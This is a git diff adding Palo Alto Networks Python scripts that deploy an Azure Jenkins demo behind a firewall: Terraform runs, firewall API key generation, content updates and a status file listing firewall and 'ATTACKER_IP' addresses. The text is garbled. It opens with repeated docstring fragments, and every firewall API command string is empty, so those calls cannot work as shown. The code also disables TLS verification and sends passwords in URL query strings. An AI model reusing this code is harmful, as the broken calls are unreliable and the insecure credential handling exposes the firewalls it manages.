# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage
+
+python deploy.py -u <fwusername> -p<fwpassword> -r<resource group> -j<region>
Handles terraform operations and returns variables in outputs.tf as a dict.
+:param working_dir: Directory that contains the tf files
+:param vars: Additional variables passed in to override defaults equivalent to -var
+:param description: Description of the deployment for logging purposes
+:return: return_code - 0 for success or other for failure
+ outputs - Dictionary of the terraform outputs defined in the outputs.tf file
Generates a Paloaltonetworks api key from username and password credentials
+:param hostname: Ip address of firewall
+:param username:
+:param password:
+:return: api_key API key for firewall
Handles sending requests to API
+:param call: url
+:return: Retruns result of call. Will return response for codes between 200 and 400.
+ If 200 response code is required check value in response
Finds a key in a dict or nested dict and returns the value associated with it
+:param d: dict or nested dict
+:param key: key value
+:return: value associated with key
# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage
+
+python deploy.py -u <fwusername> -p<fwpassword> -r<resource group> -j<region>
Handles terraform operations and returns variables in outputs.tf as a dict.
+:param working_dir: Directory that contains the tf files
+:param vars: Additional variables passed in to override defaults equivalent to -var
+:param description: Description of the deployment for logging purposes
+:return: return_code - 0 for success or other for failure
+ outputs - Dictionary of the terraform outputs defined in the outputs.tf file
Generates a Paloaltonetworks api key from username and password credentials
+:param hostname: Ip address of firewall
+:param username:
+:param password:
+:return: api_key API key for firewall
Handles sending requests to API
+:param call: url
+:return: Retruns result of call. Will return response for codes between 200 and 400.
+ If 200 response code is required check value in response
Finds a key in a dict or nested dict and returns the value associated with it
+:param d: dict or nested dict
+:param key: key value
+:return: value associated with key
+
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/deploy.py b/azure/Jenkins_proj-working/deploy.py
new file mode 100644
index 00000000..ee691764
--- /dev/null
+++ b/azure/Jenkins_proj-working/deploy.py
@@ -0,0 +1,730 @@
+#!/usr/bin/env python3
+"""
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage
+
+python deploy.py --username -p -r -j
+
+"""
+
+import argparse
+import json
+import logging
+import os
+import subprocess
+import sys
+import time
+import uuid
+import xml.etree.ElementTree as ET
+import xmltodict
+import requests
+import urllib3
+
+from azure.common import AzureException
+from azure.storage.file import FileService
+
+
+from pandevice import firewall
+from python_terraform import Terraform
+from collections import OrderedDict
+
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+_archive_dir = './WebInDeploy/bootstrap'
+_content_update_dir = './WebInDeploy/content_updates/'
+
+logging.basicConfig(level=logging.INFO)
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+
+
+# global var to keep status output
+status_output = dict()
+
+
+def send_request(call):
+
+ """
+ Handles sending requests to API
+ :param call: url
+ :return: Retruns result of call. Will return response for codes between 200 and 400.
+ If 200 response code is required check value in response
+ """
+ headers = {'Accept-Encoding' : 'None',
+ 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) '
+ 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+
+ try:
+ r = requests.get(call, headers = headers, verify=False, timeout=5)
+ r.raise_for_status()
+ except requests.exceptions.HTTPError as errh:
+ '''
+ Firewall may return 5xx error when rebooting. Need to handle a 5xx response
+ '''
+ logger.debug("DeployRequestException Http Error:")
+ raise DeployRequestException("Http Error:")
+ except requests.exceptions.ConnectionError as errc:
+ logger.debug("DeployRequestException Connection Error:")
+ raise DeployRequestException("Connection Error")
+ except requests.exceptions.Timeout as errt:
+ logger.debug("DeployRequestException Timeout Error:")
+ raise DeployRequestException("Timeout Error")
+ except requests.exceptions.RequestException as err:
+ logger.debug("DeployRequestException RequestException Error:")
+ raise DeployRequestException("Request Error")
+ else:
+ return r
+
+
+class DeployRequestException(Exception):
+ pass
+
+def walkdict(dict, match):
+ """
+ Finds a key in a dict or nested dict and returns the value associated with it
+ :param d: dict or nested dict
+ :param key: key value
+ :return: value associated with key
+ """
+ for key, v in dict.items():
+ if key == match:
+ jobid = v
+ return jobid
+ elif isinstance(v, OrderedDict):
+ found = walkdict(v, match)
+ if found is not None:
+ return found
+
+
+
+def update_fw(fwMgtIP, api_key):
+ """
+ Applies latest AppID, Threat and AV updates to firewall after launch
+ :param fwMgtIP: Firewall management IP
+ :param api_key: API key
+
+ """
+ # # Download latest applications and threats
+
+ type = "op"
+ cmd = ""
+ call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+ getjobid = 0
+ jobid = ''
+ key = 'job'
+
+ # FIXME - Remove Duplicate code for parsing jobid
+
+ while getjobid == 0:
+ try:
+ r = send_request(call)
+ logger.info('Got response {} to request for content upgrade '.format(r.text))
+ except:
+ DeployRequestException
+ logger.info("Didn't get http 200 response. Try again")
+ else:
+ try:
+ dict = xmltodict.parse(r.text)
+ if isinstance(dict, OrderedDict):
+ jobid = walkdict(dict, key)
+ except Exception as err:
+ logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+ if not jobid:
+ logger.info('Got http 200 response but didnt get jobid')
+ time.sleep(30)
+ else:
+ getjobid = 1
+
+ # FIXME - Remove Duplicate code for showing job status
+
+ completed = 0
+ while (completed == 0):
+ time.sleep(45)
+ call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key)
+ try:
+ r = send_request(call)
+ logger.info('Got Response {} to show jobs '.format(r.text))
+ except:
+ DeployRequestException
+ logger.debug("failed to get jobid this time. Try again")
+ else:
+ tree = ET.fromstring(r.text)
+ if tree.attrib['status'] == 'success':
+ try:
+ if (tree[0][0][5].text == 'FIN'):
+ logger.debug("APP+TP download Complete ")
+ completed = 1
+ print("Download latest Applications and Threats update")
+ status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str(
+ tree[0][0][12].text) + "% complete"
+ print('{0}\r'.format(status))
+ except:
+ logger.info('Checking job is complete')
+ completed = 1
+ else:
+ logger.info('Unable to determine job status')
+ completed = 1
+
+ # Install latest content update
+ type = "op"
+ cmd = "latestno"
+ call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+ getjobid = 0
+ jobid = ''
+ key = 'job'
+
+ while getjobid == 0:
+ try:
+ r = send_request(call)
+ logger.info('Got response {} to request for content upgrade '.format(r.text))
+ except:
+ DeployRequestException
+ logger.info("Didn't get http 200 response. Try again")
+ else:
+ try:
+ dict = xmltodict.parse(r.text)
+ if isinstance(dict, OrderedDict):
+ jobid = walkdict(dict, key)
+ except Exception as err:
+ logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+ if not jobid:
+ logger.info('Got http 200 response but didnt get jobid')
+ time.sleep(30)
+ else:
+ getjobid = 1
+
+ completed = 0
+ while (completed == 0):
+ time.sleep(45)
+ call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key)
+ try:
+ r = send_request(call)
+ logger.info('Got Response {} to show jobs '.format(r.text))
+ except:
+ DeployRequestException
+ logger.debug("failed to get jobid this time. Try again")
+ else:
+ tree = ET.fromstring(r.text)
+ if tree.attrib['status'] == 'success':
+ try:
+ if (tree[0][0][5].text == 'FIN'):
+ logger.debug("APP+TP Install Complete ")
+ completed = 1
+ print("Install latest Applications and Threats update")
+ status = "APP+TP Install Status - " + str(tree[0][0][5].text) + " " + str(
+ tree[0][0][12].text) + "% complete"
+ print('{0}\r'.format(status))
+ except:
+ logger.info('Checking job is complete')
+ completed = 1
+ else:
+ logger.info('Unable to determine job status')
+ completed = 1
+
+
+ # Download latest anti-virus update without committing
+ getjobid = 0
+ jobid = ''
+ type = "op"
+ cmd = ""
+ key = 'job'
+ while getjobid == 0:
+ try:
+ call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+ r = send_request(call)
+ logger.info('Got response to request AV install {}'.format(r.text))
+ except:
+ DeployRequestException
+ logger.info("Didn't get http 200 response. Try again")
+ else:
+ try:
+ dict = xmltodict.parse(r.text)
+ if isinstance(dict, OrderedDict):
+ jobid = walkdict(dict, key)
+ except Exception as err:
+ logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+ if not jobid:
+ logger.info('Got http 200 response but didnt get jobid')
+ time.sleep(30)
+ else:
+ getjobid = 1
+
+ completed = 0
+ while (completed == 0):
+ time.sleep(45)
+ call = "https://%s/api/?type=op&cmd=%s&key=%s" % (
+ fwMgtIP, jobid, api_key)
+ r = send_request(call)
+ tree = ET.fromstring(r.text)
+ logger.debug('Got response for show job {}'.format(r.text))
+ if tree.attrib['status'] == 'success':
+ try:
+ if (tree[0][0][5].text == 'FIN'):
+ logger.info("AV install Status Complete ")
+ completed = 1
+ else:
+ status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete"
+ print('{0}\r'.format(status))
+ except:
+ logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid))
+ completed = 1
+ else:
+ logger.info('Unable to determine job status')
+ completed = 1
+
+
+def getApiKey(hostname, username, password):
+
+ """
+ Generates a Paloaltonetworks api key from username and password credentials
+ :param hostname: Ip address of firewall
+ :param username:
+ :param password:
+ :return: api_key API key for firewall
+ """
+
+
+ call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password)
+
+ api_key = ""
+ while True:
+ try:
+ # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read()
+ response = send_request(call)
+
+
+ except DeployRequestException as updateerr:
+ logger.info("No response from FW. Wait 20 secs before retry")
+ time.sleep(10)
+ continue
+
+ else:
+ api_key = ET.XML(response.content)[0][0].text
+ logger.info("FW Management plane is Responding so checking if Dataplane is ready")
+ logger.debug("Response to get_api is {}".format(response))
+ return api_key
+
+
+def getFirewallStatus(fwIP, api_key):
+ fwip = fwIP
+
+ """
+ Gets the firewall status by sending the API request show chassis status.
+ :param fwMgtIP: IP Address of firewall interface to be probed
+ :param api_key: Panos API key
+ """
+
+ url = "https://%s/api/?type=op&cmd=&key=%s" % (fwip, api_key)
+ # Send command to fw and see if it times out or we get a response
+ logger.info("Sending command 'show chassis status' to firewall")
+ try:
+ response = requests.get(url, verify=False, timeout=10)
+ response.raise_for_status()
+ except requests.exceptions.Timeout as fwdownerr:
+ logger.debug("No response from FW. So maybe not up!")
+ return 'no'
+ # sleep and check again?
+ except requests.exceptions.HTTPError as fwstartgerr:
+ '''
+ Firewall may return 5xx error when rebooting. Need to handle a 5xx response
+ raise_for_status() throws HTTPError for error responses
+ '''
+ logger.infor("Http Error: {}: ".format(fwstartgerr))
+ return 'cmd_error'
+ except requests.exceptions.RequestException as err:
+ logger.debug("Got RequestException response from FW. So maybe not up!")
+ return 'cmd_error'
+ else:
+ logger.debug("Got response to 'show chassis status' {}".format(response))
+
+ resp_header = ET.fromstring(response.content)
+ logger.debug('Response header is {}'.format(resp_header))
+
+ if resp_header.tag != 'response':
+ logger.debug("Did not get a valid 'response' string...maybe a timeout")
+ return 'cmd_error'
+
+ if resp_header.attrib['status'] == 'error':
+ logger.debug("Got an error for the command")
+ return 'cmd_error'
+
+ if resp_header.attrib['status'] == 'success':
+ # The fw responded with a successful command execution. So is it ready?
+ for element in resp_header:
+ if element.text.rstrip() == 'yes':
+ logger.info("FW Chassis is ready to accept configuration and connections")
+ return 'yes'
+ else:
+ logger.info("FW Chassis not ready, still waiting for dataplane")
+ time.sleep(10)
+ return 'almost'
+
+
+def update_status(key, value):
+ """
+ For tracking purposes. Write responses to file.
+ :param key:
+ :param value:
+ :return:
+ """
+ global status_output
+
+ if type(status_output) is not dict:
+ logger.info('Creating new status_output object')
+ status_output = dict()
+
+ if key is not None and value is not None:
+ status_output[key] = value
+
+ # write status to file to future tracking
+ write_status_file(status_output)
+
+
+def write_status_file(message_dict):
+ """
+ Writes the deployment state to a dict and outputs to file for status tracking
+ """
+ try:
+ message_json = json.dumps(message_dict)
+ with open('deployment_status.json', 'w+') as dpj:
+ dpj.write(message_json)
+
+ except ValueError as ve:
+ logger.error('Could not write status file!')
+ print('Could not write status file!')
+ sys.exit(1)
+
+
+def create_azure_fileshare(share_prefix, account_name, account_key):
+ """
+ Generate a unique share name to avoid overlaps in shared infra
+ :param share_prefix:
+ :param account_name:
+ :param account_key:
+ :return:
+ """
+
+ # FIXME - Need to remove hardcoded directoty link below
+
+ d_dir = './WebInDeploy/bootstrap'
+ share_name = "{0}-{1}".format(share_prefix.lower(), str(uuid.uuid4()))
+ print('using share_name of: {}'.format(share_name))
+
+ # archive_file_path = _create_archive_directory(files, share_prefix)
+
+ try:
+ # ignore SSL warnings - bad form, but SSL Decrypt causes issues with this
+ s = requests.Session()
+ s.verify = False
+
+ file_service = FileService(account_name=account_name, account_key=account_key, request_session=s)
+
+ # print(file_service)
+ if not file_service.exists(share_name):
+ file_service.create_share(share_name)
+
+ for d in ['config', 'content', 'software', 'license']:
+ print('creating directory of type: {}'.format(d))
+ if not file_service.exists(share_name, directory_name=d):
+ file_service.create_directory(share_name, d)
+
+ # FIXME - We only handle bootstrap files. May need to handle other dirs
+
+ if d == 'config':
+ for filename in os.listdir(d_dir):
+ print('creating file: {0}'.format(filename))
+ file_service.create_file_from_path(share_name, d, filename, os.path.join(d_dir, filename))
+
+ except AttributeError as ae:
+ # this can be returned on bad auth information
+ print(ae)
+ return "Authentication or other error creating bootstrap file_share in Azure"
+
+ except AzureException as ahe:
+ print(ahe)
+ return str(ahe)
+ except ValueError as ve:
+ print(ve)
+ return str(ve)
+
+ print('all done')
+ return share_name
+
+
+def getServerStatus(IP):
+ """
+ Gets the server status by sending an HTTP request and checking for a 200 response code
+
+ """
+ global gcontext
+
+ call = ("http://" + IP + "/")
+ logger.info('URL request is {}'.format(call))
+ # Send command to fw and see if it times out or we get a response
+ count = 0
+ max_count = 12
+ while True:
+ if count < max_count:
+ time.sleep(10)
+ try:
+ count = count + 1
+ r = send_request(call)
+ except DeployRequestException as e:
+ logger.debug("Got Invalid response".format(e))
+ else:
+ logger.info('Jenkins Server responded with HTTP 200 code')
+ return 'server_up'
+ else:
+ break
+ return 'server_down'
+
+
+def apply_tf(working_dir, vars, description):
+
+ """
+ Handles terraform operations and returns variables in outputs.tf as a dict.
+ :param working_dir: Directory that contains the tf files
+ :param vars: Additional variables passed in to override defaults equivalent to -var
+ :param description: Description of the deployment for logging purposes
+ :return: return_code - 0 for success or other for failure
+ outputs - Dictionary of the terraform outputs defined in the outputs.tf file
+
+ """
+ # Set run_plan to TRUE is you wish to run terraform plan before apply
+ run_plan = False
+ kwargs = {"auto-approve": True}
+
+ # Class Terraform uses subprocess and setting capture_output to True will capture output
+ capture_output = kwargs.pop('capture_output', False)
+
+ if capture_output is True:
+ stderr = subprocess.PIPE
+ stdout = subprocess.PIPE
+ else:
+ # if capture output is False, then everything will essentially go to stdout and stderrf
+ stderr = sys.stderr
+ stdout = sys.stdout
+
+ start_time = time.asctime()
+ print('Starting Deployment at {}\n'.format(start_time))
+
+ # Create Bootstrap
+
+ tf = Terraform(working_dir=working_dir)
+
+ tf.cmd('init')
+ if run_plan:
+
+ # print('Calling tf.plan')
+ tf.plan(capture_output=False)
+
+ return_code, stdout, stderr = tf.apply(vars = vars, capture_output = capture_output,
+ skip_plan = True, **kwargs)
+ outputs = tf.output()
+
+ logger.debug('Got Return code {} for deployment of {}'.format(return_code, description))
+
+ return (return_code, outputs)
+
+
+def main(username, password, rg_name, azure_region):
+
+ """
+ Main function
+ :param username:
+ :param password:
+ :param rg_name: Resource group name prefix
+ :param azure_region: Region
+ :return:
+ """
+ username = username
+ password = password
+
+ WebInBootstrap_vars = {
+ 'RG_Name': rg_name,
+ 'Azure_Region': azure_region
+ }
+
+ WebInDeploy_vars = {
+ 'Admin_Username': username,
+ 'Admin_Password': password,
+ 'Azure_Region': azure_region
+ }
+
+ WebInFWConf_vars = {
+ 'Admin_Username': username,
+ 'Admin_Password': password
+ }
+
+ # Set run_plan to TRUE is you wish to run terraform plan before apply
+ run_plan = False
+ kwargs = {"auto-approve": True}
+
+ #
+ return_code, outputs = apply_tf('./WebInBootstrap',WebInBootstrap_vars, 'WebInBootstrap')
+
+ if return_code == 0:
+ share_prefix = 'jenkins-demo'
+ resource_group = outputs['Resource_Group']['value']
+ bootstrap_bucket = outputs['Bootstrap_Bucket']['value']
+ storage_account_access_key = outputs['Storage_Account_Access_Key']['value']
+ update_status('web_in_bootstrap_status', 'success')
+ else:
+ logger.info("WebInBootstrap failed")
+ update_status('web_in_bootstap_status', 'error')
+ print(json.dumps(status_output))
+ exit(1)
+
+
+ share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key)
+
+ WebInDeploy_vars.update({'Storage_Account_Access_Key': storage_account_access_key})
+ WebInDeploy_vars.update({'Bootstrap_Storage_Account': bootstrap_bucket})
+ WebInDeploy_vars.update({'RG_Name': resource_group})
+ WebInDeploy_vars.update({'Attack_RG_Name': resource_group})
+ WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name})
+
+ #
+ # Build Infrastructure
+ #
+ #
+
+
+ return_code, web_in_deploy_output = apply_tf('./WebInDeploy', WebInDeploy_vars, 'WebInDeploy')
+
+ logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code))
+
+
+ update_status('web_in_deploy_output', web_in_deploy_output)
+ if return_code == 0:
+ update_status('web_in_deploy_status', 'success')
+ albDns = web_in_deploy_output['ALB-DNS']['value']
+ fwMgt = web_in_deploy_output['MGT-IP-FW-1']['value']
+ nlbDns = web_in_deploy_output['NLB-DNS']['value']
+ fwMgtIP = web_in_deploy_output['MGT-IP-FW-1']['value']
+
+ logger.info("Got these values from output of WebInDeploy \n\n")
+ logger.info("AppGateway address is {}".format(albDns))
+ logger.info("Internal loadbalancer address is {}".format(nlbDns))
+ logger.info("Firewall Mgt address is {}".format(fwMgt))
+
+ else:
+ logger.info("WebInDeploy failed")
+ update_status('web_in_deploy_status', 'error')
+ print(json.dumps(status_output))
+ exit(1)
+
+ #
+ # Check firewall is up and running
+ #
+ #
+
+ api_key = getApiKey(fwMgtIP, username, password)
+
+ while True:
+ err = getFirewallStatus(fwMgtIP, api_key)
+ if err == 'cmd_error':
+ logger.info("Command error from fw ")
+
+ elif err == 'no':
+ logger.info("FW is not up...yet")
+ # print("FW is not up...yet")
+ time.sleep(60)
+ continue
+
+ elif err == 'almost':
+ logger.info("MGT up waiting for dataplane")
+ time.sleep(20)
+ continue
+
+ elif err == 'yes':
+ logger.info("FW is up")
+ break
+
+ logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions')
+ time.sleep(10)
+ fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password)
+
+
+ logger.info("Updating firewall with latest content pack")
+ update_fw(fwMgtIP, api_key)
+
+ #
+ # Configure Firewall
+ #
+ WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP})
+
+ logger.info("Applying addtional config to firewall")
+
+ return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf')
+
+ if return_code == 0:
+ update_status('web_in_fw_conf', 'success')
+ logger.info("WebInFWConf ok")
+
+ else:
+ logger.info("WebInFWConf sent return code {}".format(return_code))
+ update_status('web_in_deploy_status', 'error')
+ print(json.dumps(status_output))
+ exit(1)
+
+ logger.info("Commit changes to firewall")
+
+ fw.commit()
+ logger.info("waiting for commit")
+ time.sleep(60)
+ logger.info("waiting for commit")
+
+ #
+ # Check Jenkins
+ #
+
+ logger.info('Checking if Jenkins Server is ready')
+
+ res = getServerStatus(albDns)
+
+ if res == 'server_up':
+ logger.info('Jenkins Server is ready')
+ logger.info('\n\n ### Deployment Complete ###')
+ logger.info('\n\n Connect to Jenkins Server at http://{}'.format(albDns))
+ else:
+ logger.info('Jenkins Server is down')
+ logger.info('\n\n ### Deployment Complete ###')
+
+ # dump out status to stdout
+ print(json.dumps(status_output))
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Get Terraform Params')
+ parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+ parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+ parser.add_argument('-r', '--resource_group', help='Resource Group', required=True)
+ parser.add_argument('-j', '--azure_region', help='Azure Region', required=True)
+
+ args = parser.parse_args()
+ username = args.username
+ password = args.password
+ resource_group = args.resource_group
+ azure_region = args.azure_region
+
+ main(username, password, resource_group, azure_region)
diff --git a/azure/Jenkins_proj-working/deployment_status.json b/azure/Jenkins_proj-working/deployment_status.json
new file mode 100644
index 00000000..96c9a020
--- /dev/null
+++ b/azure/Jenkins_proj-working/deployment_status.json
@@ -0,0 +1 @@
+{"web_in_bootstrap_status": "success", "web_in_deploy_output": {"ALB-DNS": {"sensitive": false, "type": "string", "value": "with-ngfw-d89a.centralus.cloudapp.azure.com"}, "ATTACKER_IP": {"sensitive": false, "type": "string", "value": "52.165.238.28"}, "Attacker_RG_Name": {"sensitive": false, "type": "string", "value": "pglynn-sf-2e37-7250"}, "MGT-IP-FW-1": {"sensitive": false, "type": "string", "value": "52.165.238.25"}, "NATIVE-DNS": {"sensitive": false, "type": "string", "value": "sans-ngfw-d89a.centralus.cloudapp.azure.com"}, "NLB-DNS": {"sensitive": false, "type": "string", "value": "10.0.4.10"}, "RG_Name": {"sensitive": false, "type": "string", "value": "pglynn-sf-2e37"}}, "web_in_deploy_status": "success", "web_in_fw_conf": "success"}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/deployold.py b/azure/Jenkins_proj-working/deployold.py
new file mode 100644
index 00000000..b2ddb37e
--- /dev/null
+++ b/azure/Jenkins_proj-working/deployold.py
@@ -0,0 +1,628 @@
+#!/usr/bin/env python3
+"""
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage
+
+python deploy.py -u -p -r -j
+
+"""
+
+import argparse
+import json
+import logging
+import os
+import subprocess
+import sys
+import time
+import uuid
+import xml.etree.ElementTree as ET
+import xmltodict
+
+import requests
+import urllib3
+from azure.common import AzureException
+from azure.storage.file import FileService
+from pandevice import firewall
+from python_terraform import Terraform
+from collections import OrderedDict
+
+# from . import cache_utils
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+_archive_dir = './WebInDeploy/bootstrap'
+_content_update_dir = './WebInDeploy/content_updates/'
+
+logging.basicConfig(level=logging.INFO)
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+logger.setLevel(logging.INFO)
+
+# global var to keep status output
+status_output = dict()
+
+
+def send_request(call):
+
+ headers = {'Accept-Encoding' : 'None',
+ 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) '
+ 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+
+ try:
+ r = requests.get(call, headers = headers, verify=False, timeout=5)
+ r.raise_for_status()
+ except requests.exceptions.HTTPError as errh:
+ '''
+ Firewall may return 5xx error when rebooting. Need to handle a 5xx response
+ '''
+ logger.debug("DeployRequestException Http Error:")
+ raise DeployRequestException("Http Error:")
+ except requests.exceptions.ConnectionError as errc:
+ logger.debug("DeployRequestException Connection Error:")
+ raise DeployRequestException("Connection Error")
+ except requests.exceptions.Timeout as errt:
+ logger.debug("DeployRequestException Timeout Error:")
+ raise DeployRequestException("Timeout Error")
+ except requests.exceptions.RequestException as err:
+ logger.debug("DeployRequestException RequestException Error:")
+ raise DeployRequestException("Request Error")
+ else:
+ return r
+
+
+class DeployRequestException(Exception):
+ pass
+
+
+def listRecursive (d, key):
+ for k, v in d.items ():
+ if isinstance (v, OrderedDict):
+ for found in listRecursive (v, key):
+ yield found
+ if k == key:
+ yield v
+
+def update_fw(fwMgtIP, api_key):
+ # # Download latest applications and threats
+
+ type = "op"
+ cmd = ""
+ call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+ getjobid =0
+ jobid = ''
+ key ='job'
+
+ # FIXME - Remove Duplicate code for parsing jobid
+
+ while getjobid == 0:
+ try:
+ r = send_request(call)
+ logger.info('Got response {} to request for content upgrade '.format(r.text))
+ except:
+ DeployRequestException
+ logger.info("Didn't get http 200 response. Try again")
+ else:
+ try:
+ dict = xmltodict.parse(r.text)
+ if isinstance(dict, OrderedDict):
+ for found in listRecursive(dict, 'job'):
+ jobid = found
+ except Exception as err:
+ logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+ if not jobid:
+ logger.info('Got http 200 response but didnt get jobid')
+ time.sleep(30)
+ else:
+ getjobid = 1
+
+ # FIXME - Remove Duplicate code for showing job status
+
+ completed = 0
+ while (completed == 0):
+ time.sleep(30)
+ call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key)
+ try:
+ r = send_request(call)
+ logger.info('Got Response {} to show jobs '.format(r.text))
+ except:
+ DeployRequestException
+ logger.debug("failed to get jobid this time. Try again")
+ else:
+ tree = ET.fromstring(r.text)
+ if tree.attrib['status'] == 'success':
+ try:
+ if (tree[0][0][5].text == 'FIN'):
+ logger.debug("APP+TP download Complete " )
+ completed = 1
+ print("Download latest Applications and Threats update")
+ status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str(
+ tree[0][0][12].text) + "% complete"
+ print('{0}\r'.format(status))
+ except:
+ logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid))
+ else:
+ logger.info('Unable to determine job status')
+
+
+ # install latest anti-virus update without committing
+ getjobid =0
+ jobid = ''
+ key ='job'
+ while getjobid == 0:
+ try:
+
+ type = "op"
+ cmd = "latestno"
+ call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+ r = send_request(call)
+ logger.info('Got response to request AV install {}'.format(r.text))
+ except:
+ DeployRequestException
+ logger.info("Didn't get http 200 response. Try again")
+ else:
+ try:
+ dict = xmltodict.parse(r.text)
+ if isinstance(dict, OrderedDict):
+ for found in listRecursive(dict, 'job'):
+ jobid = found
+ except Exception as err:
+ logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+ if not jobid:
+ logger.info('Got http 200 response but didnt get jobid')
